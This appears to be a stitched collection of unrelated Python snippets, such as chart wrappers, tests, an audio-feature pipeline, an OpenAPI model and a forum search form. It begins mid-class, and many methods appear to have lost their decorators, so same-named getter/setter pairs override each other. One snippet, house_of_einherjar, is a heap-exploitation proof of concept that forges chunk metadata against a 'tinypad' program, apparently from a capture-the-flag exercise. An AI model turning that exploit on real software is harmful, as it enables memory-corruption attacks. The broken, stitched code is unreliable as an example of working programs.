    """
    INCLUDE = (1, None)
    EXCLUDE = (2, False)
    ONLY = (3, True)

    def __init__(self, int_value, api_value):
        # Unpack the member's value tuple onto named attributes.
        self.int_value = int_value
        self.api_value = api_value

    def __str__(self):
        return self.name.lower()

    def __repr__(self):
        return self.__str__()

    def argparse(s):
        # argparse `type=` hook: map a CLI string onto a member; hand the raw
        # string back on failure so argparse reports an invalid choice.
        member = ArchivedResults.__members__.get(s.upper())
        return member if member is not None else s
def test_call_undefined_error_message_with_container_instance_parent():
    """Calling a factory whose Dependency is unbound must name the container
    attribute ('Container.database') in the raised error message."""
    class UserService():
        def __init__(self, database):
            self.database = database

    class Container(containers.DeclarativeContainer):
        # Left deliberately unbound to trigger the error on use.
        database = providers.Dependency()
        user_service = providers.Factory(UserService, database=database)
    container = Container()
    with raises(errors.Error, match='Dependency "Container.database" is not defined'):
        container.user_service()
def greet_user():
    """Greet a returning user, or prompt for a name and persist it to
    username.json for next time."""
    path = Path('username.json')
    stored_name = get_stored_username(path)
    if stored_name:
        print(f'Welcome back, {stored_name}!')
        return
    new_name = input('What is your name? ')
    # Remember the name for future runs.
    path.write_text(json.dumps(new_name))
    print(f"We'll remember you when you come back, {new_name}!")
class ExtensionRegistryTestMixin():
    """Shared test cases for extension-registry implementations; the concrete
    test class supplies ``self.registry``."""

    def test_empty_registry(self):
        """A fresh registry reports no extensions and no extension points."""
        registry = self.registry
        extensions = registry.get_extensions('my.ep')
        self.assertEqual(0, len(extensions))
        extension_points = registry.get_extension_points()
        self.assertEqual(0, len(extension_points))

    def test_add_extension_point(self):
        """Adding a point registers it without contributing extensions."""
        registry = self.registry
        registry.add_extension_point(self.create_extension_point('my.ep'))
        extensions = registry.get_extensions('my.ep')
        self.assertEqual(0, len(extensions))
        extension_points = registry.get_extension_points()
        self.assertEqual(1, len(extension_points))
        self.assertEqual('my.ep', extension_points[0].id)

    def test_get_extension_point(self):
        """A registered extension point can be fetched by id."""
        registry = self.registry
        registry.add_extension_point(self.create_extension_point('my.ep'))
        extension_point = registry.get_extension_point('my.ep')
        self.assertNotEqual(None, extension_point)
        self.assertEqual('my.ep', extension_point.id)

    def test_get_extension_point_return_none_if_not_found(self):
        """Unknown ids yield None rather than raising."""
        self.assertIsNone(self.registry.get_extension_point('i.do.not.exist'))

    def test_get_extensions_mutation_no_effect_if_undefined(self):
        """Mutating the returned list must not leak back into the registry."""
        extensions = self.registry.get_extensions('my.ep')
        extensions.append([[1, 2]])
        self.assertEqual(self.registry.get_extensions('my.ep'), [])

    def test_remove_empty_extension_point(self):
        """Removing a registered (empty) point leaves no points behind."""
        registry = self.registry
        registry.add_extension_point(self.create_extension_point('my.ep'))
        registry.remove_extension_point('my.ep')
        extension_points = registry.get_extension_points()
        self.assertEqual(0, len(extension_points))

    def test_remove_non_existent_extension_point(self):
        """Removing an unknown point raises UnknownExtensionPoint."""
        registry = self.registry
        with self.assertRaises(UnknownExtensionPoint):
            registry.remove_extension_point('my.ep')

    def test_remove_non_existent_listener(self):
        """Removing a never-added listener raises ValueError."""
        registry = self.registry

        def listener(registry, extension_point, added, removed, index):
            self.listener_called = (registry, extension_point, added, removed)
        with self.assertRaises(ValueError):
            registry.remove_extension_point_listener(listener)

    def create_extension_point(self, id, trait_type=List, desc=''):
        """Helper: build an ExtensionPoint with the given id."""
        return ExtensionPoint(id=id, trait_type=trait_type, desc=desc)
class Permission(models.Model):
    """Named permission with a human-readable alias displayed in the GUI."""
    # Distinguishes real DB-backed permissions from dummy placeholders.
    is_dummy = False
    name = models.CharField(_('name'), max_length=80, unique=True)
    alias = models.CharField(_('alias'), max_length=80)

    class Meta():
        app_label = 'gui'
        verbose_name = _('Permission')
        verbose_name_plural = _('Permissions')

    def __unicode__(self):
        # Python 2-style display method; shows the alias, not the name.
        return ('%s' % self.alias)
class OptionPlotoptionsScatterSonificationContexttracksMappingRate(Options):
    """Auto-generated Highcharts wrapper: rate mapping options for the
    sonification context tracks of scatter series.

    NOTE(review): each option below appears as a getter/setter pair sharing one
    name; the @property / @<name>.setter decorators were presumably stripped
    during extraction — confirm against the code generator's output.
    """

    def mapFunction(self):
        # Mapping function for the rate parameter; no default configured.
        return self._config_get(None)

    def mapFunction(self, value: Any):
        self._config(value, js_type=False)

    def mapTo(self):
        # Point property to map this parameter to.
        return self._config_get(None)

    def mapTo(self, text: str):
        self._config(text, js_type=False)

    def max(self):
        # Upper bound of the mapped range.
        return self._config_get(None)

    def max(self, num: float):
        self._config(num, js_type=False)

    def min(self):
        # Lower bound of the mapped range.
        return self._config_get(None)

    def min(self, num: float):
        self._config(num, js_type=False)

    def within(self):
        # What data scope the mapping is computed within.
        return self._config_get(None)

    def within(self, value: Any):
        self._config(value, js_type=False)
# NOTE(review): this bare tuple looks like the argument list of a stripped
# Dash @app.callback(...) decorator — restore it when merging.
(Output('readiness-exclamation', 'style'), [Input('readiness-date', 'children')])
def show_readiness_exclamation(dummy):
    """Return a style showing the warning icon when the Oura readiness data
    lags behind the other Oura summaries."""
    show = {'display': 'inline-block', 'fontSize': '1rem', 'color': orange, 'paddingLeft': '1%'}
    hide = {'display': 'none'}
    # Latest report date available in each Oura summary table.
    max_sleep_date = app.session.query(func.max(ouraSleepSummary.report_date)).first()[0]
    max_readiness_date = app.session.query(func.max(ouraReadinessSummary.report_date)).first()[0]
    max_activity_date = app.session.query(func.max(ouraActivitySummary.summary_date)).first()[0]
    app.session.remove()
    max_date = max([max_sleep_date, max_readiness_date, max_activity_date])
    # Show the exclamation only when readiness is not the freshest dataset.
    readiness_style = (show if (max_readiness_date != max_date) else hide)
    return readiness_style
def gtp_rat_timeout_profile(data, fos):
    """Create/update or delete a gtp rat-timeout-profile object on FortiOS.

    Dispatches on ``data['state']``: 'present' (or True) issues a set,
    'absent' issues a delete keyed by the profile name, and anything else
    fails the Ansible module.
    """
    vdom = data['vdom']
    state = data['state']
    payload = underscore_to_hyphen(filter_gtp_rat_timeout_profile_data(data['gtp_rat_timeout_profile']))
    if state == 'present' or state is True:
        return fos.set('gtp', 'rat-timeout-profile', data=payload, vdom=vdom)
    if state == 'absent':
        return fos.delete('gtp', 'rat-timeout-profile', mkey=payload['name'], vdom=vdom)
    fos._module.fail_json(msg='state must be present or absent!')
def trace_galerkin_projection(degree, quad=False, conv_test_flag=0, mesh_res=None):
    """Project a CG field onto an HDiv trace space and return the facet L2 error.

    Solves the Galerkin projection of f = cos(2*pi*x)*cos(2*pi*y) onto the
    'HDiv Trace' space over all exterior (ds) and interior (dS) facets, then
    measures the facet-weighted L2 difference between the projection and f.

    Args:
        degree: polynomial degree of the trace space.
        quad: use a quadrilateral mesh when True.
        conv_test_flag: 0 -> f lives in CG of the same degree;
            1 -> f lives in CG of degree+1 (for convergence testing).
        mesh_res: None for a fixed 10x10 mesh, or an int r for a 2^r x 2^r mesh.

    Raises:
        ValueError: for invalid mesh_res or conv_test_flag values.
    """
    if (mesh_res is None):
        mesh = UnitSquareMesh(10, 10, quadrilateral=quad)
    elif isinstance(mesh_res, int):
        mesh = UnitSquareMesh((2 ** mesh_res), (2 ** mesh_res), quadrilateral=quad)
    else:
        raise ValueError('Integers or None are only accepted for mesh_res.')
    (x, y) = SpatialCoordinate(mesh)
    T = FunctionSpace(mesh, 'HDiv Trace', degree)
    lambdar = TrialFunction(T)
    gammar = TestFunction(T)
    if (conv_test_flag == 0):
        V = FunctionSpace(mesh, 'CG', degree)
        f = Function(V)
    elif (conv_test_flag == 1):
        # Higher-degree source for convergence studies.
        hdv = FunctionSpace(mesh, 'CG', (degree + 1))
        f = Function(hdv)
    else:
        raise ValueError('conv_test should be either 0 or 1')
    f.interpolate((cos(((x * pi) * 2)) * cos(((y * pi) * 2))))
    # Mass-matrix forms over exterior and interior facets ('+' restriction).
    a = ((inner(lambdar, gammar) * ds) + (inner(lambdar('+'), gammar('+')) * dS))
    l = ((inner(f, gammar) * ds) + (inner(f('+'), gammar('+')) * dS))
    t = Function(T)
    solve((a == l), t, solver_parameters={'ksp_rtol': 1e-14})
    # Facet-area-weighted L2 error on interior facets.
    trace_error = sqrt(assemble(((FacetArea(mesh) * inner((t - f)('+'), (t - f)('+'))) * dS)))
    return trace_error
class MyClass():
    """Example class whose `compute` has a transpiled fast path via `ts`."""

    def __init__(self, a, b):
        # Operand arrays used by compute().
        self.a = a
        self.b = b

    def compute(self, n):
        """Accumulate (a**2 + b**3) elementwise, n times."""
        a = self.a
        b = self.b
        if ts.is_transpiled:
            # Use the pre-transpiled kernel when the transpiler is active.
            result = ts.use_block('block0')
        else:
            # Pure-Python/NumPy fallback with identical semantics.
            result = np.zeros_like(a)
            for _ in range(n):
                result += ((a ** 2) + (b ** 3))
        return result
def genomicRegion(string):
    """Normalize a genomic-region string to 'chrom:start:end' form.

    Whitespace and the separators ,;|!{}() are stripped, and '-' becomes ':'.
    An empty/whitespace-only input yields None.

    Raises:
        argparse.ArgumentTypeError: if nothing remains after stripping.
    """
    region = ''.join(string.split())
    if not region:
        return None
    # Keep the Python 2 branch for backward compatibility with old runtimes.
    if (sys.version_info[0] == 2):
        region = region.translate(None, ',;|!{}()').replace('-', ':')
    if (sys.version_info[0] == 3):
        region = region.translate(str.maketrans('', '', ',;|!{}()')).replace('-', ':')
    if not region:
        raise argparse.ArgumentTypeError('{} is not a valid region'.format(string))
    return region
class Definition(Block):
    """Markdown block extension rendering a `define` block as an HTML <dl>,
    normalizing its children into <dt>/<dd> elements."""
    NAME = 'define'

    def on_create(self, parent):
        # The block's container element is a definition list.
        return etree.SubElement(parent, 'dl')

    def on_end(self, block):
        """Rewrite children: <p> becomes <dt>, other non-list tags get wrapped
        in a <dt>, and each <li> of a nested <ul>/<ol> is hoisted out as a
        <dd>; the emptied list containers are removed afterwards."""
        remove = []
        # Running insertion offset caused by hoisted list items.
        offset = 0
        for (i, child) in enumerate(list(block)):
            if (child.tag.lower() in ('dt', 'dd')):
                # Already in definition-list form; leave untouched.
                continue
            elif (child.tag.lower() not in ('ul', 'ol')):
                if (child.tag.lower() == 'p'):
                    # Paragraphs become terms directly.
                    child.tag = 'dt'
                else:
                    # Anything else gets wrapped inside a fresh <dt>.
                    dt = etree.Element('dt')
                    dt.append(child)
                    block.insert((i + offset), dt)
                    block.remove(child)
            else:
                # Hoist each list item out as a description, preserving order
                # via the running offset.
                for li in list(child):
                    offset += 1
                    li.tag = 'dd'
                    block.insert((i + offset), li)
                    child.remove(li)
                remove.append(child)
        for el in remove:
            # Drop the now-empty list containers.
            block.remove(el)
def decode_snooz(snooz):
    """Decode a btsnooz blob and stream a btsnoop capture to stdout.

    The blob starts with a 9-byte header (u8 version, u64 last timestamp in
    milliseconds) followed by a zlib-compressed payload. Only versions 1 and
    2 are supported; anything else aborts with exit status 1.
    """
    (version, last_timestamp_ms) = struct.unpack_from('=bQ', snooz)
    if version not in (1, 2):
        sys.stderr.write('Unsupported btsnooz version: %s\n' % version)
        # sys.exit instead of the bare exit() helper: exit() is injected by
        # the `site` module for interactive use and may be absent (python -S,
        # frozen apps), while sys.exit is always available.
        sys.exit(1)
    # Skip the 9-byte header before decompressing the payload.
    decompressed = zlib.decompress(snooz[9:])
    # btsnoop file header: magic, version 1, datalink type 0x3ea.
    sys.stdout.buffer.write(b'btsnoop\x00\x00\x00\x00\x01\x00\x00\x03\xea')
    if (version == 1):
        decode_snooz_v1(decompressed, last_timestamp_ms)
    elif (version == 2):
        decode_snooz_v2(decompressed, last_timestamp_ms)
def validate_boolean(rule):
    """Coerce ``rule['value']`` into a bool.

    Accepts 1/t/true and 0/f/false (any case, any str()-able type);
    anything else raises InvalidParameterException.
    """
    normalized = str(rule['value']).lower()
    if normalized in ('1', 't', 'true'):
        return True
    if normalized in ('0', 'f', 'false'):
        return False
    msg = (INVALID_TYPE_MSG.format(**rule) + '. Use true/false')
    raise InvalidParameterException(msg)
class ProcessData():
    """Slices audio files into voiced clips and extracts per-clip features
    (f0 via CREPE, perceptual loudness, RMS power), writing clips and
    features into one HDF5 file per input folder."""

    def __init__(self, silence_thresh_dB, sr, device, seq_len, crepe_params, loudness_params, rms_params, hop_size, max_len, center, overlap=0.0, debug=False, contiguous=False, contiguous_clip_noise=False):
        super().__init__()
        self.silence_thresh_dB = silence_thresh_dB
        self.crepe_params = crepe_params
        self.sr = sr
        self.device = torch.device(device)
        self.seq_len = seq_len
        self.loudness_params = loudness_params
        self.rms = rms_params
        self.max_len = max_len
        self.hop_size = hop_size
        # Number of feature frames in a max-length clip.
        self.feat_size = ((self.max_len * self.sr) // self.hop_size)
        # Number of audio samples in a max-length clip.
        self.audio_size = (self.max_len * self.sr)
        self.center = center
        self.overlap = overlap
        self.debug = debug
        self.contiguous = contiguous
        self.contiguous_clip_noise = contiguous_clip_noise

    def set_confidence(self, confidence):
        """Override the CREPE f0 confidence threshold."""
        self.crepe_params.confidence_threshold = confidence

    def process_indices(self, indices: list) -> list:
        """Split (start, end) sample spans longer than max_len into max_len
        windows and drop spans shorter than seq_len."""
        max_len = (self.max_len * self.sr)

        def expand_long(indices_tuple: tuple) -> list:
            # Chop an over-long span into consecutive max_len windows plus a
            # final (possibly shorter) remainder window.
            if ((indices_tuple[1] - indices_tuple[0]) > max_len):
                ret = [(start, (start + max_len)) for start in np.arange(indices_tuple[0], (indices_tuple[1] - max_len), max_len)]
                ret.append((ret[(- 1)][(- 1)], min((ret[(- 1)][(- 1)] + max_len), indices_tuple[1])))
                return ret
            else:
                return [indices_tuple]
        new_indices = [*map(expand_long, indices)]
        # Flatten the list of lists of spans.
        new_indices = functools.reduce(operator.concat, new_indices, [])
        # Keep only spans long enough to yield a full training sequence.
        new_indices = [x for x in new_indices if ((x[1] - x[0]) > (self.seq_len * self.sr))]
        return new_indices

    def pad_to_expected_size(self, features, expected_size, pad_value):
        """Right-pad `features` with `pad_value`.

        In contiguous mode, pad up to the next multiple of `expected_size`;
        otherwise pad exactly to `expected_size`, raising if already larger.
        """
        if (self.contiguous == True):
            pad_len = ((((features.shape[(- 1)] // expected_size) + 1) * expected_size) - features.shape[(- 1)])
            features = np.pad(features, (0, pad_len), 'constant', constant_values=pad_value)
            return features
        else:
            if self.debug:
                print('Feat shape {} - expected size: {}'.format(features.shape[(- 1)], expected_size))
            if (features.shape[(- 1)] < expected_size):
                pad_len = (expected_size - features.shape[(- 1)])
                features = np.pad(features, (0, pad_len), 'constant', constant_values=pad_value)
            if (features.shape[(- 1)] > expected_size):
                raise Exception('Expected size is smaller than current value')
            return features

    def extract_f0(self, audio):
        """Run CREPE pitch tracking on a clip.

        Raises:
            ValueError: when mean confidence falls below the threshold.
        """
        (f0, confidence) = spectral_ops.calc_f0(audio, rate=self.sr, hop_size=self.hop_size, fmin=self.crepe_params.fmin, fmax=self.crepe_params.fmax, model=self.crepe_params.model, batch_size=self.crepe_params.batch_size, device=self.device, center=self.center)
        if (confidence.mean() < self.crepe_params.confidence_threshold):
            raise ValueError('Low f0 confidence')
        f0 = self.pad_to_expected_size(f0, expected_size=self.feat_size, pad_value=0)
        return f0

    def calc_loudness(self, audio):
        """Compute frame-wise loudness, padded with the dB floor."""
        loudness = spectral_ops.calc_loudness(audio, rate=self.sr, n_fft=self.loudness_params.nfft, hop_size=self.hop_size, center=self.center)
        loudness = self.pad_to_expected_size(loudness, expected_size=self.feat_size, pad_value=(- _DB_RANGE))
        return loudness

    def calc_rms(self, audio):
        """Compute frame-wise RMS power, padded with the dB floor."""
        rms = spectral_ops.calc_power(audio, frame_size=self.rms.frame_size, hop_size=self.hop_size, pad_end=True)
        rms = self.pad_to_expected_size(rms, expected_size=self.feat_size, pad_value=(- _DB_RANGE))
        return rms

    def save_data(self, audio, f0, loudness, rms, h5f, counter):
        """Write one clip's datasets into the HDF5 file; return next counter."""
        h5f.create_dataset(f'{counter}_audio', data=audio)
        h5f.create_dataset(f'{counter}_f0', data=f0)
        h5f.create_dataset(f'{counter}_loudness', data=loudness)
        h5f.create_dataset(f'{counter}_rms', data=rms)
        return (counter + 1)

    def init_h5(self, data_dir):
        """Open (truncate) the output HDF5 file, named after the sample rate."""
        return h5py.File((data_dir / f'{self.sr}.h5'), 'w')

    def close_h5(self, h5f):
        h5f.close()
    # NOTE(review): this bare string looks like a misplaced docstring for the
    # method below; as written it is a no-op statement at class level.
    '\n    Main audio processing function\n    '
    def run_on_files(self, data_dir, input_dir, output_dir):
        """Process every .wav under input_dir/data_dir into output_dir/data_dir."""
        audio_files = list((input_dir / data_dir).glob('*.wav'))
        output_dir = (output_dir / data_dir)
        output_dir.mkdir(exist_ok=True)
        h5f = self.init_h5(output_dir)
        counter = 0
        for audio_file in tqdm(audio_files):
            if self.debug:
                print('Processing: {}'.format(audio_file))
            (data, sr) = librosa.load(audio_file.as_posix(), sr=self.sr)
            data = librosa.util.normalize(data)
            sounds_indices = []
            if self.contiguous:
                # Contiguous mode: treat the whole file as one span.
                sounds_indices.append([0, len(data)])
            else:
                # Otherwise split the file on silence.
                sounds_indices = librosa.effects.split(data, top_db=self.silence_thresh_dB)
            sounds_indices = self.process_indices(sounds_indices)
            if (len(sounds_indices) == 0):
                continue
            for indices in sounds_indices:
                audio = data[indices[0]:indices[1]]
                if self.debug:
                    print('\tIndexes: {} {} - len: {}'.format(indices[0], indices[1], (indices[1] - indices[0])))
                try:
                    f0 = self.extract_f0(audio)
                except ValueError:
                    # Skip clips whose pitch confidence is too low.
                    continue
                loudness = self.calc_loudness(audio)
                rms = self.calc_rms(audio)
                if self.contiguous:
                    if self.contiguous_clip_noise:
                        if self.debug:
                            print('[DEBUG] clipping noise')
                        # Silence frames whose f0 exceeds 1900 Hz.
                        clip_pos = (f0 > 1900.0)
                        loudness[clip_pos] = (- _DB_RANGE)
                    audio = self.pad_to_expected_size(audio, (f0.shape[0] * self.hop_size), 0)
                else:
                    audio = self.pad_to_expected_size(audio, self.audio_size, 0)
                if self.debug:
                    print(f' Store block {counter}: f0 : {f0.shape} - loudness : {loudness.shape} - rms {rms.shape} - audio : {audio.shape}')
                counter = self.save_data(audio, f0, loudness, rms, h5f, counter)
        self.close_h5(h5f)

    def run_on_dirs(self, input_dir: Path, output_dir: Path):
        """Process every immediate sub-folder of input_dir."""
        folders = [x for x in input_dir.glob('./*') if x.is_dir()]
        for folder in tqdm(folders):
            self.run_on_files(folder.name, input_dir, output_dir)
def dump_tags(location):
    """Parse a Matroska file and print its length plus its Tags element."""
    from pprint import pprint
    mka = parse(location)
    segment = mka['Segment'][0]
    info = segment['Info'][0]
    try:
        timecodescale = info['TimecodeScale'][0]
    except KeyError:
        # Matroska default: 1,000,000 ns per timecode unit.
        timecodescale = 1000000
    # Duration is expressed in timecode units; scale to nanoseconds, then
    # divide by 1e9 for seconds. (The divisor had been corrupted to `.0`,
    # which made this an unconditional ZeroDivisionError.)
    length = ((info['Duration'][0] * timecodescale) / 1000000000.0)
    print(('Length = %s seconds' % length))
    pprint(segment['Tags'][0]['Tag'])
class DataTable(OptPlotly.DataChart):
    """Plotly 'table' trace wrapper.

    NOTE(review): the paired same-named methods (columnorder, columnwidth) and
    the attribute-style use of `domain` in `set_domain` suggest @property /
    setter decorators were stripped during extraction — confirm against the
    original module.
    """

    def domain(self) -> DataDomain:
        # Lazily materialized sub-data object for the table's plot domain.
        return self.sub_data('domain', DataDomain)

    def set_domain(self, x, y=None):
        """Set the table's domain; y defaults to x."""
        self.domain.x = x
        self.domain.y = (y or x)

    def columnorder(self):
        return self._attrs['columnorder']

    def columnorder(self, val):
        self._attrs['columnorder'] = val

    def columnwidth(self):
        return self._attrs['columnwidth']

    def columnwidth(self, val):
        self._attrs['columnwidth'] = val

    def header(self) -> DataHeader:
        # Header cell configuration sub-object.
        return self.sub_data('header', DataHeader)

    def cells(self) -> DataCells:
        # Body cell configuration sub-object.
        return self.sub_data('cells', DataCells)
class ExpansionConverter(object):
    """Converts expansion configuration dictionaries into trees of
    TypeNode/ExpansionNode objects (and back)."""

    def __init__(self, type_routes, type_expansions):
        # Route definitions (service/action/fields) keyed by route name.
        self.type_routes = type_routes
        # Per-type expansion definitions keyed by type, then expansion name.
        self.type_expansions = type_expansions

    def dict_to_trees(self, expansion_dict):
        """Build a TypeNode tree for each entry of ``expansion_dict``.

        Each expansion string (a dot-separated path) is walked segment by
        segment, creating ExpansionNodes on demand from the configured
        type_expansions/type_routes.

        Raises:
            ValueError: if an expansion's destination_field equals its
                source_field.
        """
        trees = []
        for (node_type, expansion_list) in six.iteritems(expansion_dict):
            type_node = TypeNode(node_type=node_type)
            for expansion_string in expansion_list:
                expansion_node = type_node
                for expansion_name in expansion_string.split('.'):
                    # Reuse an existing child node for this path segment.
                    child_expansion_node = expansion_node.get_expansion(expansion_name)
                    if (not child_expansion_node):
                        type_expansion = self.type_expansions[expansion_node.type][expansion_name]
                        type_route = self.type_routes[cast(six.text_type, type_expansion['route'])]
                        if (type_expansion['destination_field'] == type_expansion['source_field']):
                            raise ValueError('Expansion configuration destination_field error: destination_field can not have the same name as the source_field: {}'.format(type_expansion['source_field']))
                        child_expansion_node = ExpansionNode(node_type=cast(six.text_type, type_expansion['type']), name=expansion_name, source_field=cast(six.text_type, type_expansion['source_field']), destination_field=cast(six.text_type, type_expansion['destination_field']), service=type_route['service'], action=type_route['action'], request_field=type_route['request_field'], response_field=type_route['response_field'], raise_action_errors=cast(bool, type_expansion.get('raise_action_errors', False)))
                        expansion_node.add_expansion(child_expansion_node)
                    expansion_node = child_expansion_node
            trees.append(type_node)
        return trees

    # NOTE(review): no `self` parameter — presumably a stripped @staticmethod
    # decorator; confirm before merging.
    def trees_to_dict(trees_list):
        """Merge each tree's dict representation into a single dict."""
        result = {}
        for tree in trees_list:
            result.update(tree.to_dict())
        return result
class SchemasVclResponse(ModelComposed):
    """Auto-generated OpenAPI composed model for a VCL API response.

    NOTE(review): the bare ``_property`` and ``_js_args_to_python_args``
    lines below are presumably mangled decorators (e.g. ``@cached_property``
    and ``@convert_js_args_to_python_args`` from the OpenAPI generator)
    stripped during extraction — restore them when merging; as written they
    are bare-name expressions.
    """
    # No enum-restricted values and no extra validations for this schema.
    allowed_values = {}
    validations = {}
    _property
    def additional_properties_type():
        # Types accepted for properties not listed in openapi_types.
        lazy_import()
        return (bool, date, datetime, dict, float, int, list, str, none_type)
    _nullable = False
    _property
    def openapi_types():
        # Map of attribute name -> accepted (type, ...) tuple.
        lazy_import()
        return {'content': (str,), 'main': (bool,), 'name': (str,), 'service_id': (str,), 'version': (int,), 'created_at': (datetime, none_type), 'deleted_at': (datetime, none_type), 'updated_at': (datetime, none_type)}
    _property
    def discriminator():
        # No polymorphic discriminator for this schema.
        return None
    # JSON key names are identical to the Python attribute names.
    attribute_map = {'content': 'content', 'main': 'main', 'name': 'name', 'service_id': 'service_id', 'version': 'version', 'created_at': 'created_at', 'deleted_at': 'deleted_at', 'updated_at': 'updated_at'}
    # Server-populated attributes; settable only via _from_openapi_data.
    read_only_vars = {'service_id', 'version', 'created_at', 'deleted_at', 'updated_at'}
    _js_args_to_python_args
    def _from_openapi_data(cls, *args, **kwargs):
        """Deserialize server data into an instance (read-only vars allowed)."""
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        self = super(OpenApiModel, cls).__new__(cls)
        if args:
            raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        # Track visited classes to avoid infinite recursion in composition.
        self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
        constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
        composed_info = validate_get_composed_info(constant_args, kwargs, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        discarded_args = composed_info[3]
        for (var_name, var_value) in kwargs.items():
            # Optionally drop unknown keys instead of raising.
            if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
                continue
            setattr(self, var_name, var_value)
        return self
    # Internal attributes that must always exist on instances.
    required_properties = set(['_data_store', '_check_type', '_spec_property_naming', '_path_to_item', '_configuration', '_visited_composed_classes', '_composed_instances', '_var_name_to_model_instances', '_additional_properties_model_instances'])
    _js_args_to_python_args
    def __init__(self, *args, **kwargs):
        """Construct an instance from user data; read-only vars are rejected."""
        _check_type = kwargs.pop('_check_type', True)
        _spec_property_naming = kwargs.pop('_spec_property_naming', False)
        _path_to_item = kwargs.pop('_path_to_item', ())
        _configuration = kwargs.pop('_configuration', None)
        _visited_composed_classes = kwargs.pop('_visited_composed_classes', ())
        if args:
            raise ApiTypeError(('Invalid positional arguments=%s passed to %s. Remove those invalid positional arguments.' % (args, self.__class__.__name__)), path_to_item=_path_to_item, valid_classes=(self.__class__,))
        self._data_store = {}
        self._check_type = _check_type
        self._spec_property_naming = _spec_property_naming
        self._path_to_item = _path_to_item
        self._configuration = _configuration
        self._visited_composed_classes = (_visited_composed_classes + (self.__class__,))
        constant_args = {'_check_type': _check_type, '_path_to_item': _path_to_item, '_spec_property_naming': _spec_property_naming, '_configuration': _configuration, '_visited_composed_classes': self._visited_composed_classes}
        composed_info = validate_get_composed_info(constant_args, kwargs, self)
        self._composed_instances = composed_info[0]
        self._var_name_to_model_instances = composed_info[1]
        self._additional_properties_model_instances = composed_info[2]
        discarded_args = composed_info[3]
        for (var_name, var_value) in kwargs.items():
            if ((var_name in discarded_args) and (self._configuration is not None) and self._configuration.discard_unknown_keys and self._additional_properties_model_instances):
                continue
            setattr(self, var_name, var_value)
            # Client code may not set server-managed attributes directly.
            if (var_name in self.read_only_vars):
                raise ApiAttributeError(f'`{var_name}` is a read-only attribute. Use `from_openapi_data` to instantiate class with read only attributes.')
    _property
    def _composed_schemas():
        # Composition: this schema is the allOf of these three models.
        lazy_import()
        return {'anyOf': [], 'allOf': [ServiceIdAndVersion, Timestamps, Vcl], 'oneOf': []}
def extractTericherryWordpressCom(item):
    """Map a tericherry.wordpress.com feed item to a release message.

    Returns None for previews or items without a chapter/volume, False when
    no known tag matched.
    """
    title = item['title']
    (vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(title)
    if not (chp or vol) or 'preview' in title.lower():
        return None
    if 'WATTT' in item['tags']:
        return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
    return False
def house_of_einherjar():
    """Heap-exploitation proof of concept (House of Einherjar style) against
    the `tinypad` target.

    NOTE(review): relies on helpers/globals defined elsewhere in this script
    (delete/add/edit, p64, heap_base, tinypad); the sizes and the constant
    6299712 below are presumably target-binary specific — confirm against
    the exploited binary before reuse.
    """
    delete(4)
    # 224 filler bytes, then a value computed relative to the tinypad buffer.
    fake_chunk1 = ('A' * 224)
    fake_chunk1 += p64(((heap_base + 240) - tinypad))
    add(232, fake_chunk1)
    # Forged chunk data: a size field of 256 followed by pointer-sized values.
    fake_chunk2 = p64(256)
    fake_chunk2 += p64(((heap_base + 240) - tinypad))
    fake_chunk2 += (p64(6299712) * 4)
    edit(2, fake_chunk2)
    # Freeing index 2 triggers the corrupted-metadata path set up above.
    delete(2)
def get_weather(longitude: float, latitude: float):
    """Fetch current weather data for the given coordinates.

    Returns the decoded JSON payload on HTTP 200; raises otherwise.
    """
    logger = get_run_logger()
    logger.info(f'Getting weather of latitude={latitude} and longitude={longitude}')
    # NOTE(review): the original endpoint URL was lost in extraction (the
    # line was a truncated, unterminated f-string). Open-Meteo matches the
    # lat/long call shape; TODO confirm and restore the actual service URL.
    api_endpoint = f'https://api.open-meteo.com/v1/forecast?latitude={latitude}&longitude={longitude}&current_weather=true'
    response = requests.get(api_endpoint)
    if (response.status_code == 200):
        weather_data = json.loads(response.text)
        logger.debug(weather_data)
        return weather_data
    else:
        raise Exception(('Failed to query ' + api_endpoint))
class SearchPageForm(FlaskForm):
    """Forum-wide search form: a query string plus the content types to search."""
    search_query = StringField(_('Criteria'), validators=[DataRequired(), Length(min=3, max=50)])
    search_types = SelectMultipleField(_('Content'), validators=[DataRequired()], choices=[('post', _('Post')), ('topic', _('Topic')), ('forum', _('Forum')), ('user', _('Users'))])
    submit = SubmitField(_('Search'))

    def get_results(self):
        """Run a whooshee full-text search per selected content type.

        Returns:
            dict mapping each selected type name ('post', 'topic', 'forum',
            'user') to its query result.
        """
        search_actions = {'post': Post.query.whooshee_search, 'topic': Topic.query.whooshee_search, 'forum': Forum.query.whooshee_search, 'user': User.query.whooshee_search}
        query = self.search_query.data
        types = self.search_types.data
        results = {}
        for search_type in search_actions.keys():
            # Only search the types the user ticked.
            if (search_type in types):
                results[search_type] = search_actions[search_type](query)
        return results
def add_service():
    """Factory returning a helper that installs and registers a Fledge service.

    NOTE(review): likely decorated with @pytest.fixture upstream -- confirm.
    """
    def _add_service(fledge_url, service, service_branch, retries, installation_type='make', service_name='', enabled=True):
        # If a service of this type is already registered, reuse it as-is.
        retval = utils.get_request(fledge_url, '/fledge/service')
        for ele in retval['services']:
            if (ele['type'].lower() == service):
                return ele
        # Repository root: four directory levels above this test module.
        PROJECT_ROOT = Path(__file__).parent.parent.parent.parent
        def clone_make_install():
            # Build and install the C service from source via helper script.
            try:
                subprocess.run(['{}/tests/system/python/scripts/install_c_service {} {}'.format(PROJECT_ROOT, service_branch, service)], shell=True, check=True)
